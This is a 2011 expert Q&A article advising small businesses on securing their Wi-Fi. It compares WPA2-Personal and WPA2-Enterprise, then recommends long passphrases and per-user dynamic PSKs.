What’s the best wireless network security for our small business wireless network?
In his SearchMidMarketSecurity tip "Enabling the best WiFi security for SMBs without hurting usability," Mike Chappel describes small business use of WPA2-Personal (PSK) and WPA2-Enterprise (802.1X). WPA2-Personal typically uses a shared passphrase to authenticate everyone connected to the same WLAN, while WPA2-Enterprise typically authenticates individuals based on their own credentials – a machine certificate, a Windows username/password, a SecurID token, etc.
As Mike noted, WPA2-Enterprise can be challenging for small businesses because it requires a RADIUS server, linked to an account database containing user credentials that must be configured into every Wi-Fi client. Two implementation options that make WPA2-Enterprise more palatable to SMBs are an AP or WLAN controller with an embedded RADIUS server, or a hosted (or cloud-based) RADIUS service. These options are perfect for many SMBs, and are often well worth the associated effort or cost to achieve more robust, granular WLAN security.
However, both still require configuring Wi-Fi clients (802.1X supplicants) to recognize and accept the server's certificate and respond to the Extensible Authentication Protocol (EAP) type expected by that RADIUS server. This configuration isn't rocket science, but it isn't as easy as typing a passphrase. Because 802.1X requires at least a server certificate, it can be harder to configure on devices with limited GUIs (like smartphones or wireless printers). Finally, 802.1X problems can be a bear to troubleshoot.
SMBs that consider but conclude that they really cannot step up to WPA2-Enterprise (802.1X) should know there are ways to make better, safer use of WPA2-Personal (PSK). For starters, PSK security is heavily dependent on the length and strength of your chosen passphrase. Use a mixed-case passphrase that is at least 20 characters long, avoiding words found in dictionaries, in conjunction with an unusual SSID. To test the strength of your WPA2-Personal passphrase, run it through an on-line WPA Cracker.
However, even a strong passphrase is still vulnerable to shared password risks – for example, giving the passphrase to someone who shouldn't have it, or having to change the passphrase if an employee is fired or loses a laptop. To circumvent these concerns, consider using APs that support dynamic per-user passphrases. The 802.11 standards do not require every client to use the same PSK; some vendors have capitalized on this by issuing unique passphrases to every user. Per-user passphrases deter insider attacks (like decrypting other user's traffic). Dynamic per-user passphrases can also be time-bounded, so that guests only have access for a limited period of time. Some implementations can even help visitors or helpdesks register for dynamic passphrases to simplify generation and distribution. To learn more, check out Aerohive's Private PSK and Ruckus' Dynamic PSK solutions.
This was first published in January 2011